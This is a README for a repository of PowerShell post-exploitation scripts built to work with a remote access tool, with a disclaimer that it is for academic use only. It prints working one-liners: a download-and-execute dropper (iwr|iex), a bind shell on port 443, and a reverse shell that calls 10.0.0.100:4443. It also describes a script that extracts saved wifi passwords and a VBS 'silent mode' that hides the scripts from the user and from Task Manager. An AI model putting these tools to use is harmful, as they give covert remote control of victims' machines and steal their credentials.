PS>

This repository contains a collection of simple PowerShell scripts designed for Post-Exploitation tasks

DISCLAIMER: THIS PROJECT IS FOR ACADEMIC PURPOSES ONLY. THE DEVELOPERS TAKE NO RESPONSIBILITY FOR ILLEGAL USAGE AND/OR POTENTIAL HARMS.

The scripts provided are meant to be used in conjunction with a Remote Access Tool such as hyp3r.

You can use the following one-liner to execute the scripts on the target machine using a reverse shell such as the one provided by hyp3r

#powerhsell dropper
(New-Object Net.WebClient).Proxy.Credentials=[Net.CredentialCache]::DefaultNetworkCredentials;iwr('URL')|iex

Silent mode

By leveraging certain Visual Basic commands and functionalities, all the scripts can be executed without displaying a window, effectively hiding them from the user.

All the scripts in this repository include a Silent Mode script (.vbs) written in Visual Basic. To run the PowerShell scripts in silent mode, download both the .ps1 and .vbs files, then execute the .vbs script. This setup currently works well, as it doesn’t appear in Task Manager or with the tasklist command. However, you can still terminate the task if needed, and the connection will be visible in netstat for both shells. I plan to streamline this process in the future!

• wifiscr (Used for extracting wifi passwords on the target machine)

• bindscr (Used for setting up a simple bind shell on the target machine)

One-Liner version for bind shell:

$listener = [System.Net.Sockets.TcpListener]443;$listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();$listener.Stop()

• revscr (Used for setting up an interactive reverse shell on the target machine)

Powershell reverse shell one-liner by Nikhil SamratAshok Mittal @samratashok

$client = New-Object System.Net.Sockets.TCPClient('10.0.0.100',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PSReverseShell# ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()}$client.Close();

Credits to ivan-sincek

Most of the scripts in this repository have been modified from their original versions, which are listed below.

- wifiscr.ps1 - (source)

- bindscr.ps1 - (source)

- revscr.ps1 - (source)

Roadmap

• Testing and Validation: Perform comprehensive testing to ensure the reliability and effectiveness of the scripts.
• Simplifying Execution: Streamline the process for running scripts together to improve user experience.
• Enhancing Documentation: Update and clarify documentation for better guidance on script usage.
• Adding Features: Consider new features and enhancements based on user feedback.

Feedback is open at:

[email protected]